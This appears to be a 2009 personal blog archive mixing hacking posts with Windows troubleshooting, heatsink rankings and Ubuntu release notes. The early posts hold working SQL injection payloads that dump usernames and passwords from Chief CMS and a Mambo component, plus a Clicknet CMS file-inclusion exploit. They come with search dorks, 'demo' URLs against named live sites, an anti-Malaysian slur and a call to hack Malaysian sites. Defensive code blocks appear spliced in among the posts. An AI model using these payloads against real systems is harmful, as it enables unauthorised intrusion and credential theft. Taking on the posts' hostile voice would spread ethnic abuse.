Tuesday, November 17, 2009

SQLi via schemafuzz

I was spacing out at my boarding house and, rather than be bored with nothing to do, I idly went looking for a target using SQLi.. then, rather than bother with doing the SQL injection myself, I just used schemafuzz to keep it simple and not long-winded, hehehe

Before we use schemafuzz on Windows, we first need to install Perl and Python to run schemafuzz, etc... because schemafuzz uses Python ....

For those who don't have it yet, it can be downloaded here

Once it is installed, find a target !!

The target I used this time is www.kasumbo.com/products.php?id=8

Then we raise our schemafuzz.... once our schemafuzz has risen from its grave, we immediately type

schemafuzz.py --findcol -u www.kasumbo.com/products.php?id=8


After that it will automatically look for where the bug is on the target's site...


Monday, November 16, 2009

Saturday, October 3, 2009

Bloggers Si Dhudulzz


BloGgerS Si dhudulzz

Tuesday, September 15, 2009

Chief Content Management System

##############################################################
## Chief Content Management System - news.php?id= ##
## Author : kaMtiEz (kamzcrew@yahoo.com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : September 14, 2009 ##
##############################################################
/~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_
/~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__
/~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___
/~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____
____________________________________________________________
-=- KILL-9 CREW -=- INDONESIANCODER -=-

##############################################################


[ Software Information ]

[+] Vendor : http://www.chiefcms.com/
[+] Software : Chief Content Management System
[+] Vulnerability : SQL injection
[+] Dork : "Powered by The Chief"

##############################################################

[ Vulnerable File ]

http://127.0.0.1/news.php?id=[KILL-9 Crew SQLi]


[ Exploit ]

-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

[ Demo ]

http://www.chiefcms.com/news.php?id=-666+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password)kaMtiEz,8,9,10,11,12,13,14,15,16,17+from+cmsUsers--

##############################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] Don Tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_aneh
[+] Contrex,onthel,yasea,bugs,olivia,Jovan1,Aar,Ardy
[+] Coracore,black666girl,chitoz,NepT,ichal,tengik and YOU!!

[ NOTE ]

This is My birthday i am 18 !!


[ QUOTE ]

"This is my chest, where is yours?

If Malaysia wants an economic confrontation, let us face it with an economic confrontation
If Malaysia wants a political confrontation, let us face it with a political confrontation
If Malaysia wants a military confrontation, let us face it with a military confrontation

Soekarno, 1963”

Soekarno : I hereby declare "CRUSH MALAYSIA"

FUCK MALAYSIA !!!



# www.indonesiancoder.com

Clicknet CMS v2.1 Remote File Inclusion

################################################################
## Clicknet CMS v2.1 Remote File Inclusion ##
## Author : Don Tukulesto (root[at]indonesiancoder[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, September 14, 2009 ##
################################################################

[ Software Information ]

[+] Clicknet CMS v2.1(index.php) Remote File Inclusion
[+] Vendor : http://cms.clicknet.dk
[+] Download : http://cms.clicknet.dk/download/index.php?test=2
[+] Dork : “Powered by Clicknet CMS”

################################################################


[ ExPL0!T ]

http://127.0.0.1/index.php?_SERVER[DOCUMENT_ROOT]=[WWW.INDONESIANCODER.COM]

[ D3M0]

http://www.kimage.dk/fotografisk/?_SERVER[DOCUMENT_ROOT]=

################################################################

[ Greetings ]

[+] Indonesian Coder, SurabayaHackerLink, ServerIsDown, Mainhack Brotherhood
[+] M3NW5, BH4ND55, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, Senot, Joker, oghy, Den Awink
Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d, TUCKER, Ian Petrucii, Chercut, B4YU5154, Baim
[+] bejat Bejat, Plaque, Tuex, rey_cute, BenyCooL, D3miT_EvoLUtiOn, XNITRO, DraCoola.com
[+] Jack-, Yadoy666 + MIYA666, kecemplungkalen, xshadow, exnome, H4ck3rKu, kaMtiEz, Arianom,
[+] V3N0M, tiw0l, Pathloader and YOU !!!

[ QUOTE ]

“This is my chest, where is yours?

If Malaysia wants an economic confrontation, let us face it with an economic confrontation
If Malaysia wants a political confrontation, let us face it with a political confrontation
If Malaysia wants a military confrontation, let us face it with a military confrontation

Soekarno, 1963”

fvck MALAYSIA !!!


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Thursday, September 10, 2009

Mambo Component com_hestar Remote SQL Injection Vulnerability

## com_hestar 1.0.0 ##
## Author : M3NW5 (M3NW5[at]hackermail[dot]com) ##
## Homepage : http://www.indonesiancoder.com ##
## Date : Monday, September 07,2009 ##


[ Software Information ]

[+] Software : com_hestar
[+] Version : 1.0.0
[+] Provider : Netvistun - netvistun@netvistun.is
[+] Web Provider : www.netvistun.is
[+] Vulnerability : SQL injection
[+] Google Dork : inurl:"com_hestar"

#####################################################
[ POC ]

http://127.0.0.1/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--


[ Demo ]

http://www.arbae.is/index.php?option=com_hestar&task=showlist&id=-3 union select concat_ws(0x3a,username,password)+from+mos_users--
#####################################################

[ Greetings ]

[+] All of Indonesian Coder Member, Don Tukulesto, mistersaint, gonzhack, m364tr0n, cyb3r_tr0n, TUCKER, Petrucii, Chercut,
Senot, Joker, Rebel, Quick_5ilv3r, ran, m4ho666, DenBayan, vyc0d
[+] All of Surabayahackerlink Member, Awan, Plaque, rey_cute, Tuex, XNITRO, DraCoola.com
[+] ServerIsDown.org, Jack-, Yadoy666, kecemplungkalen, xshadow, H4ck3rKu
[+] Kill-9 Crew, kaMtiEz, Arianom

[ SHOUT ]

STILL FVCKED TO MALAYSIA, TRULLY THIEF COUNTRY IN ASIA.
Let's Hack Malaysian site. PROUD TO BE INDONESIAN !!!!!

[ Special to ]

Anggie Lestari, eldest daughter of the family of Mr. Dodi and Mrs. Dini ^^ i lope yu pull...

# milw0rm.com [2009-09-09]
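
Seen from the defending side, the three advisories above (the `id=` parameter in Chief CMS `news.php` and in com_hestar, and the `_SERVER[DOCUMENT_ROOT]` parameter in Clicknet CMS) leave recognisable traces in a web server access log. The following is an added example, not part of the original posts or of any of the projects named: the log lines are constructed, and the rule that `id` must be a plain integer, as well as the names `classify_request` and `scan`, are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are only ever plain integers in legitimate use
# (the numeric "id" parameter that appears in the advisories above).
INTEGER_PARAMS = {"id"}

# PHP superglobal names. A request parameter carrying one of these names is an
# attempt to overwrite server-side state (the _SERVER[DOCUMENT_ROOT] case).
SUPERGLOBALS = {"_SERVER", "_GET", "_POST", "_COOKIE", "_FILES", "_ENV",
                "_REQUEST", "_SESSION", "GLOBALS"}

UNION_SELECT = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE | re.DOTALL)
INTEGER = re.compile(r"-?\d+")

# Request target inside a combined-format access log line. The lazy match
# tolerates raw spaces in the target, which some clients send unencoded.
REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')


def classify_request(target):
    """Return a sorted list of finding labels for one request target."""
    findings = set()
    query = urlsplit(target).query
    # parse_qsl decodes %xx escapes and turns '+' into a space, so encoded
    # and unencoded payloads are compared in the same form.
    for name, value in parse_qsl(query, keep_blank_values=True):
        base = name.split("[", 1)[0]
        if base in SUPERGLOBALS:
            findings.add("superglobal-overwrite")
        if name in INTEGER_PARAMS and not INTEGER.fullmatch(value.strip()):
            findings.add("non-integer-id")
            if UNION_SELECT.search(value):
                findings.add("union-select")
    return sorted(findings)


def scan(lines):
    """Return (line_number, findings) for every log line with a finding."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        findings = classify_request(match.group(1))
        if findings:
            hits.append((lineno, findings))
    return hits


# Constructed sample log (documentation addresses, shortened payloads).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Sep/2009:10:00:01 +0000] '
    '"GET /news.php?id=8 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [14/Sep/2009:10:00:07 +0000] '
    '"GET /news.php?id=-1+union+select+1,2,3-- HTTP/1.1" 200 5301',
    '192.0.2.44 - - [14/Sep/2009:10:00:09 +0000] '
    '"GET /index.php?_SERVER[DOCUMENT_ROOT]=placeholder HTTP/1.1" 200 812',
    '192.0.2.51 - - [14/Sep/2009:10:00:12 +0000] '
    '"GET /index.php?option=com_hestar&task=showlist'
    '&id=-3%20UNION%20SELECT%201 HTTP/1.1" 200 940',
    '192.0.2.10 - - [14/Sep/2009:10:00:15 +0000] '
    '"GET /news.php?id=12abc HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for lineno, findings in scan(SAMPLE_LOG):
        print(lineno, ", ".join(findings))
```

Log matching only narrows down where to look; the fix for the two SQL cases is to bind `id` as an integer parameter in the query instead of concatenating it into the statement.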

Saturday, September 5, 2009

Task Manager User Name column is empty (username at task manager)


When you open Task Manager, the User Name field might be blank, as shown in the figure. This happens if the Terminal Services service is not started. The default startup type for this service needs to be set to Automatic, and the service must be started. Follow this procedure:

* Click Start, Run and type Services.msc
* Locate Terminal Services and double-click it
* Set the Startup type to Automatic, and click Apply
* Click the Start button to launch the service manually.
* Now Task Manager User Name field will show up.




Tuesday, May 19, 2009

TOP #5 HEATSINK BY LOW-NOISE* (for AMD CPUs) (* at maximum speed)

#1 Scythe Orochi

#2 Scythe Zipang

#3 Glacialtech Igloo 5750 Silent

#4 Verax Helado

#5 Glacialtech Igloo 7311 Silent

*Heatsinks are ranked according to the lowest decibel reading measured, while the fan is at its maximum speed. More detailed results reside in each specific heatsink review.

"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm


TOP #5 HEATSINK BY TEMPERATURE (for AMD CPUs)

#1 Thermalright Ultra 120

#2 Spire Thermax II

#3 Sunbeam Core Contact Freezer

#4 Coolermaster V8

#5 Xigmatek Dark Knight S1283

*Heatsinks are ranked according to the lowest rise in ambient temperature on Frostytech thermal test platform, with fan at maximum speed. More detailed results reside in each specific heatsink review.

"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm





TOP #5 HEATSINK BY LOW-NOISE* (for Intel LGA775 CPUs) (* at maximum speed)

#1 Scythe Orochi

#2 Scythe Zipang

#3 Glacialtech Igloo 5750 Silent

#4 Intel Stock Core 2 Duo

#5 Scythe Mine Rev. B

*Heatsinks are ranked according to the lowest decibel reading measured, while the fan is at its maximum speed. More detailed results reside in each specific heatsink review.


"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm





TOP #5 HEATSINK BY TEMPERATURE (for Intel LGA775 CPUs)

#1 Titan TTC-NK85TZ

#2 Sunbeam Core Contact Freezer

#3 Spire Thermax II

#4 Xigmatek Dark Knight S1283

#5 Thermolab BARAM

*Heatsinks are ranked according to the lowest rise in ambient temperature on Frostytech thermal test platform, with fan at maximum speed. More detailed results reside in each specific heatsink review.


"Which One Is Yours ?"

Source: www.frostytech.com/top5heatsinks.cfm





Saturday, May 16, 2009

How to edit the Boot.ini file in Windows XP

Save a Backup Copy of Boot.ini

1. Right-click My Computer, and then click Properties.
-or-
Click Start, click Run, type sysdm.cpl, and then click OK.
2. On the Advanced tab, click Settings under Startup and Recovery.
3. Under System Startup, click Edit. This opens the file in Notepad ready for editing.
4. In Notepad, click File on the Menu bar, and then click Save As.
5. Right click in an empty area of the Save As dialog box, point to New in the context menu, and then click Folder.
6. Type a name for the new folder, for example temp, and then press the ENTER key to create the folder named temp.
7. Double-click the new folder named temp, and then click the Save button to save a backup copy of the Boot.ini file.

Edit the Boot.ini File
To view and edit the Boot.ini file:

1. Right-click My Computer, and then click Properties.
-or-
Click Start, click Run, type sysdm.cpl, and then click OK.
2. On the Advanced tab, click Settings under Startup and Recovery.
3. Under System Startup, click Edit.

Sample Boot.ini File
This is a sample of a default Boot.ini file from a Windows XP Professional computer.
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /fastdetect

This is a sample of the above Boot.ini file with a previous installation of Windows 2000 on a separate partition.
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows XP Professional" /fastdetect
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows 2000 Professional" /fastdetect


Modifying the Boot.ini
While you can modify the Boot.ini file using the Startup and Recovery dialog, where you can select the default operating system, change the timeout value, or manually edit the file, the following method uses the command line utility, Bootcfg.exe.

Note The Bootcfg.exe utility is only available in Windows XP Professional. This utility is not available in Microsoft Windows XP Home Edition. Therefore, this section does not apply to Windows XP Home Edition.

1. Click Start, and then click Run.
2. In the Open text box, type cmd.
3. At the command prompt, type bootcfg /?.
4. The help and parameters for BOOTCFG.exe will display.

Adding an Operating System
At the command prompt, type:
bootcfg /copy /d Operating System Description /ID#
Where Operating System Description is a text description (e.g. Windows XP Home Edition), and where # specifies the boot entry ID in the operating systems section of the BOOT.INI file from which the copy has to be made.


Removing an Operating System
At the command prompt, type:
bootcfg /delete /ID#
Where # specifies the boot entry ID that you want to be deleted from the operating systems section of the BOOT.INI file (e.g. 2 for the second operating system that is listed).


Setting the Default Operating System
At the command prompt, type:
bootcfg /default /ID#
Where # specifies the boot entry id in the operating systems section of the BOOT.INI file to be made the default operating system.


Setting the Time Out
At the command prompt, type:
bootcfg /timeout#
Where # specifies the time in seconds after which default operating system will be loaded.


Open the Boot.ini File to Verify Changes

1. Right-click My Computer, and then click Properties.
-or-
Click Start, click Run, type sysdm.cpl, and then click OK.
2. On the Advanced tab, click Settings under Startup and Recovery.
3. Under System Startup, click Edit.



NTLDR is Missing

Issue:

NTLDR is Missing.

Related errors:


Below are the full error messages that may be seen when the computer is booting.

NTLDR is Missing
Press any key to restart

Boot: Couldn't find NTLDR
Please insert another disk

NTLDR is missing
Press Ctrl Alt Del to Restart

Cause:

1. Computer is booting from a non-bootable source.
2. Computer hard disk drive is not properly setup in BIOS.
3. Corrupt NTLDR and/or NTDETECT.COM file.
4. Misconfiguration with the boot.ini file.
5. Attempting to upgrade from a Windows 95, 98, or ME computer that is using FAT32.
6. New hard disk drive being added.
7. Corrupt boot sector / master boot record.
8. Seriously corrupted version of Windows 2000 or Windows XP.
9. Loose or Faulty IDE/EIDE hard disk drive cable.

Solutions:


Computer is booting from a non-bootable source

Many times this error is caused when the computer is attempting to boot from a non-bootable floppy disk or CD-ROM. First verify that no floppy diskette is in the computer, unless you are attempting to boot from a diskette.

If you are attempting to boot from a floppy diskette and are receiving this error message it is likely that the diskette does not have all the necessary files and/or is corrupt.

If you are attempting to install Windows XP or Windows 2000 and are receiving this error message as the computer is booting verify that your computer BIOS has the proper boot settings. For example, if you are attempting to run the install from the CD-ROM make sure the CD-ROM is the first boot device, and not the hard disk drive.

Second, when the computer is booting you should receive the below prompt.

Press any key to boot from the CD

Important: When you see this message press any key such as the Enter key immediately, otherwise it will try booting from the hard drive and likely get the NTLDR error again.

Note: If you are not receiving the above message and your BIOS boot options are set properly it's also possible that your CD-ROM drive may not be booting from the CD-ROM properly. Verify the jumpers are set properly on the CD-ROM drive. Additional information about checking the CD-ROM drive connections can be found on document CH000213.

Additional information: This error has also been known to occur when a memory stick is in a card reader and the computer is attempting to boot from it. If you have any type of card reader or flash reader make sure that no memory stick is inside the computer.

Computer hard disk drive is not properly setup in BIOS


Verify that your computer hard disk drive is properly setup in the BIOS / CMOS setup. Improper settings can cause this error. Additional information on how to enter the BIOS / CMOS setup can be found in document CH000192.

Corrupt NTLDR and/or NTDETECT.COM file

Windows 2000 users

If your computer is using Microsoft Windows 2000 and you are encountering the NTLDR error, create the below boot.ini file on the floppy diskette drive.

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINNT="Microsoft Windows 2000 Professional" /fastdetect


Copy the NTLDR and NTDETECT.COM files from another computer using the same operating system. Both of these files are located in the root directory of the primary hard disk drive. For example, C:\NTLDR and C:\NTDETECT.COM should be the locations of these files on many computers.

Please keep in mind that these files are hidden system files, if you need additional help with viewing hidden files in Windows please see document CH000516.

Once these files have been copied to a floppy diskette reboot the computer and copy the NTLDR and NTDETECT.COM files to the root directory of the primary hard disk drive. Below is an example of what commonly should be performed from the A:\> drive.

copy ntldr c:
copy ntdetect.com c:

After the above two files have been copied, remove the floppy diskette and reboot the computer.

Windows XP users


1. Insert the Windows XP bootable CD into the computer.
2. When prompted to press any key to boot from the CD, press any key.
3. Once in the Windows XP setup menu press the "R" key to repair Windows.
4. Log into your Windows installation by pressing the "1" key and pressing enter.
5. You will then be prompted for your administrator password, enter that password.
6. Copy the below two files to the root directory of the primary hard disk. In the below example we are copying these files from the CD-ROM drive letter, which in this case is "e." This letter may be different on your computer.

copy e:\i386\ntldr c:\
copy e:\i386\ntdetect.com c:\

7. Once both of these files have been successfully copied, remove the CD from the computer and reboot.

Misconfiguration with the boot.ini file

Edit the boot.ini on the root directory of the hard disk drive and verify that it is pointing to the correct location of your Windows operating system and that the partitions are properly defined. Additional information about the boot.ini can be found on document CH000492.
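
The check described above (the default entry must point at a defined operating system, and the partitions must be properly defined) can be done mechanically. This is an added example, not part of the original article or of any Microsoft tool: the function names are hypothetical, only the `multi()`/`scsi()` ARC path syntax is handled, the first sample is the Windows XP plus Windows 2000 file shown earlier on this page, and the second is a constructed broken variant.

```python
import re

# ARC path as used in the sample files: adapter, disk, rdisk, partition, then
# the Windows directory. Assumption: signature() paths are out of scope here.
ARC_PATH = re.compile(
    r"^(?:multi|scsi)\(\d+\)disk\(\d+\)rdisk\(\d+\)"
    r"partition\((?P<partition>\d+)\)\\(?P<dir>[^\\=\"]+)$",
    re.IGNORECASE)
DRIVE_PATH = re.compile(r"^[A-Za-z]:\\")  # e.g. C:\ entries for older systems


def parse_boot_ini(text):
    """Return {section name: [(key, value), ...]} with lower-cased section names."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections[current] = []
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections


def check_boot_ini(text):
    """Return a list of human-readable problems; an empty list means none found."""
    problems = []
    sections = parse_boot_ini(text)
    loader = {k.lower(): v for k, v in sections.get("boot loader", [])}
    entries = sections.get("operating systems", [])
    if not entries:
        problems.append("no entries in [operating systems]")
    default = loader.get("default")
    if default is None:
        problems.append("no default= line in [boot loader]")
    elif default.lower() not in {path.lower() for path, _ in entries}:
        problems.append("default=%s has no matching entry" % default)
    timeout = loader.get("timeout")
    if timeout is not None and not re.fullmatch(r"-?\d+", timeout):
        problems.append("timeout is not a number of seconds: %s" % timeout)
    for path, _ in entries:
        if DRIVE_PATH.match(path):
            continue
        match = ARC_PATH.match(path)
        if not match:
            problems.append("unparseable ARC path: %s" % path)
        elif int(match.group("partition")) < 1:
            # partition() counts from 1; the other ARC fields count from 0
            problems.append("partition numbering starts at 1: %s" % path)
    return problems


# Sample from this page: Windows XP with Windows 2000 on a second partition.
GOOD_BOOT_INI = r"""[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows XP Professional" /fastdetect
multi(0)disk(0)rdisk(0)partition(2)\WINNT="Windows 2000 Professional" /fastdetect
"""

# Constructed broken variant: default points at an undefined entry, and one
# entry uses partition(0).
BROKEN_BOOT_INI = r"""[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows XP Professional" /fastdetect
multi(0)disk(0)rdisk(0)partition(0)\WINNT="Windows 2000 Professional" /fastdetect
"""

if __name__ == "__main__":
    for name, text in (("good", GOOD_BOOT_INI), ("broken", BROKEN_BOOT_INI)):
        print(name, check_boot_ini(text) or "no problems found")
```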

Attempting to upgrade from a Windows 95, 98, or ME computer that is using FAT32

If you are getting this error message while you are attempting to upgrade to Windows 2000 or Windows XP from Windows 95, Windows 98, or Windows ME running FAT32 please try the below recommendations.

1. Boot the computer with a Windows 95, Windows 98 or Windows ME bootable diskette.
2. At the A:\> prompt type:

sys c:

3. After pressing enter you should receive the "System Transferred" message. Once this has been completed remove the floppy diskette and reboot the computer.

New hard disk drive being added

If you are attempting to add a new hard disk drive to the computer make sure that drive is a blank drive. Adding a new hard disk drive to a computer that already has Windows installed on it may cause the NTLDR error to occur.

If you are unsure if the new drive is blank or not try booting from a bootable diskette and format the new hard disk drive.

Corrupt boot sector / master boot record

It's possible your computer's hard disk drive may have a corrupt boot sector and/or master boot record. These can be repaired through the Microsoft Windows Recovery console by running the fixboot and fixmbr commands.

Additional information and help in getting into the Microsoft Windows Recovery console can be found on document CH000627.

Seriously corrupted version of Windows 2000 or Windows XP

If you have tried each of the above recommendations that apply to your situation and you continue to experience this issue it is possible you may have a seriously corrupted version of Microsoft Windows. Therefore we would recommend you reinstall Microsoft Windows 2000 and Windows XP.

If you are encountering this issue during your setup you may wish to completely erase your computer hard disk drive and all of its existing data and then install Microsoft Windows 2000 / Windows XP. Additional information about erasing the computer and starting over can be found on document CH000186.


Loose or Faulty IDE/EIDE hard disk drive cable


This issue has been known to be caused by a loose or faulty IDE/EIDE cable. If the above recommendation does not resolve your issue and your computer hard disk drive is using an IDE or EIDE interface, verify the computer hard disk drive cable is firmly connected by disconnecting and reconnecting the cable.

If the issue continues it is also a possibility that the computer has a faulty cable, try replacing the hard disk drive cable with another cable and/or a new cable.



Friday, April 24, 2009

Ubuntu Linux v9.04 (Jaunty Jackalope) - Final



Release date: April 23, 2009

Ubuntu is a complete Linux-based operating system, freely available with both community and professional support. It is developed by a large community and we invite you to participate too!

The Ubuntu community is built on the ideas enshrined in the Ubuntu Philosophy: that software should be available free of charge, that software tools should be usable by people in their local language and despite any disabilities, and that people should have the freedom to customise and alter their software in whatever way they see fit.

These freedoms make Ubuntu fundamentally different from traditional proprietary software: not only are the tools you need available free of charge, you have the right to modify your software until it works the way you want it to.

Ubuntu is suitable for both desktop and server use. The current Ubuntu release supports PC (Intel x86) and 64-bit PC (AMD64) architectures.

Ubuntu includes more than 16,000 pieces of software, but the core desktop installation fits on a single CD. Ubuntu covers every standard desktop application from word processing and spreadsheet applications to web server software and programming tools.



Ubuntu on the desktop

Ubuntu offers you a complete Linux-based operating system, including all the major applications you need to play and work. With a strong focus on a desktop that Just Works, Ubuntu is a great choice for home or the office. The base system and all included software is free, and support is available from the community or by professional support providers.

Desktop simplicity

When you start the system for the first time you are greeted by a desktop that is unusually clean and tidy. No desktop icons by default! Even the recycling bin has been moved down to the taskbar. The default theme is designed to be easy on the eye. But Linux is inherently flexible; you can customise the look and behaviour of the desktop in a range of ways, from simply changing the default theme to selecting a different desktop environment altogether.

Ubuntu on the server

Built on the solid foundation of Debian — known for its robust server installations — the Ubuntu Server Edition has a strong heritage for reliable performance and predictable evolution. The first Ubuntu release with a separate server edition was 5.10, in October 2005.

With the latest release, 9.04, the Ubuntu Server Edition adds support for several common configurations, bringing the ease of use that Ubuntu has become famous for on the desktop to server deployments. The new Ubuntu Server Edition provides a well-integrated platform for deploying a new server with any of the standard internet services: mail, web, DNS, file serving or database management.

A key lesson from the Debian heritage is that of security by default. The Ubuntu Server has no open ports after the installation and contains only the essential software needed to build a secure server.

Automatic LAMP (Linux, Apache, MySQL and PHP)

In about 15 minutes, the time it takes to install Ubuntu Server Edition, you can have a LAMP server up and ready to go. This feature, exclusive to Ubuntu Server Edition, is available at the time of installation.

The LAMP option saves the trouble of installing and integrating each of the four separate LAMP components, a process which can take hours and requires someone who is skilled in the installation and configuration of the individual applications. You get increased security, reduced time to install, and reduced risk of misconfiguration, all of which results in a lower cost of ownership.

Supported architectures

Ubuntu 9.04 Server Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:
http://www.ubuntu.com/



Download Ubuntu Linux v9.04 - Desktop Edition - Multi platforms:

http://releases.ubuntu.com/9.04/ubuntu-9.04-desktop-i386.iso
http://releases.ubuntu.com/9.04/ubuntu-9.04-desktop-amd64.iso

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-desktop-i386.iso
http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-desktop-amd64.iso




Download Ubuntu Linux v9.04 - Server Edition - Multi platforms:
http://releases.ubuntu.com/9.04/ubuntu-9.04-server-i386.iso
http://releases.ubuntu.com/9.04/ubuntu-9.04-server-amd64.iso

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-server-i386.iso
http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-server-amd64.iso



Download Ubuntu Linux v9.04 - Alternate Edition - Multi platforms:
http://releases.ubuntu.com/9.04/ubuntu-9.04-alternate-i386.iso
http://releases.ubuntu.com/9.04/ubuntu-9.04-alternate-amd64.iso

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-alternate-i386.iso
http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-alternate-amd64.iso




Download Ubuntu Linux v9.04 - UNR USB image - Intel x86 platform:

http://releases.ubuntu.com/9.04/ubuntu-9.04-netbook-remix-i386.img

or

http://nl2.releases.ubuntu.com/9.04/ubuntu-9.04-netbook-remix-i386.img




Other download mirrors here:
http://www.ubuntu.com/download

Kubuntu Linux v9.04 (Jaunty Jackalope) - Final



Release date: April 23, 2009

Kubuntu is a user friendly operating system based on KDE, the K Desktop Environment. With a predictable 6 month release cycle and part of the Ubuntu project, Kubuntu is the GNU/Linux distribution for everyone.

Supported architectures

Kubuntu 9.04 Edition supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:
http://www.kubuntu.com/



Download Kubuntu Linux v9.04 - Desktop Edition - Multi platforms:

http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-i386.iso
http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-amd64.iso

or

http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-i386.iso
http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-desktop-amd64.iso




Download Kubuntu Linux v9.04 - Alternate Edition - Multi platforms:
http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-i386.iso
http://releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-amd64.iso

or

http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-i386.iso
http://nl2.releases.ubuntu.com/kubuntu/9.04/kubuntu-9.04-alternate-amd64.iso




Other download mirrors here:
http://www.kubuntu.com/download

Gobuntu Linux v9.04 (Jaunty Jackalope) - Final



Release date: April 23, 2009

Gobuntu is a GNU/Linux operating system, derived from Ubuntu, that endeavors to adhere to the Free Software Foundation's four freedoms and intends to provide a base for other free software platforms to build upon with minimal modification required. It does this by only including open-source non-restricted software. This means there will be no firmware, drivers, applications, or content included in Gobuntu that does not include the full source or whose license does not provide the right to use, study, modify, and redistribute the body of work.

Gobuntu shares the same system requirements as Ubuntu. At present, this means Gobuntu is available for 32-bit and 64-Bit PC architectures and the install requires at least 4 GB of disk space.

Why would I want Gobuntu?

If you are looking to build a free software distribution based off of Ubuntu, or you wish to use an operating system that only provides you with truly free software and content, you should consider trying Gobuntu.

Please note that because running Gobuntu on most laptops and many desktops will be difficult, Gobuntu is intended for experienced Linux enthusiasts at this time.

Gobuntu is a text-based install CD. At present there is no live CD installer for Gobuntu.

Supported architectures

Gobuntu 9.04 supports the following architectures:



* Supports x86
* Supports AMD64



Homepage and more info here:

http://www.ubuntu.com/products/whatisubuntu/gobuntu



Download Gobuntu Linux v9.04 - Multi platforms:

http://cdimage.ubuntu.com/gobuntu/releases/9.04/release/gobuntu-9.04-alternate-i386.iso
http://cdimage.ubuntu.com/gobuntu/releases/9.04/release/gobuntu-9.04-alternate-amd64.iso

Mythbuntu Linux v9.04 (Jaunty Jackalope) - Final



Release date: April 23, 2009

Mythbuntu is a community supported add-on for Ubuntu focused upon setting up a standalone MythTV based PVR system. It can be used to prepare a standalone system or for integration with an existing MythTV network. Unlike similar projects, Mythbuntu keeps close ties with Ubuntu and all development is given back to Ubuntu. This architecture allows simple conversions from a standard desktop to a Mythbuntu machine and vice versa. The development cycle of Mythbuntu closely follows that of Ubuntu, releasing every six months with Ubuntu releases.

Desktop

Mythbuntu uses the XFCE4 desktop. All unnecessary standard Ubuntu applications such as OpenOffice, Evolution, and a full Gnome desktop are not installed for a Mythbuntu. If at any time a user wants to, they can install ubuntu-desktop, kubuntu-desktop, or xubuntu-desktop and add a full desktop onto their installation. This is done via the Mythbuntu Control Centre.

Mythbuntu-Control-Centre

The Mythbuntu Control Centre is a custom GUI used to configure the system. From here you can select what kind of system (Backend, Frontend, Both) you want. You can also install different desktops such as ubuntu-desktop and kubuntu-desktop. Install Plugins, configure MySQL, set passwords, install proprietary drivers, proprietary codecs, setup remote controls, and a range of other features all from one convenient program.

Live Frontend

A Mythbuntu CD can also be used as a live frontend. This is great if you want to turn a laptop or desktop into a quick frontend or quickly test hardware compatibility. The live frontend provides a GUI to mount network shares, configure a remote, hostname, location of your master backend and a place to save settings. All settings can be saved directly back to a flash drive for easy portability.

Self Replication

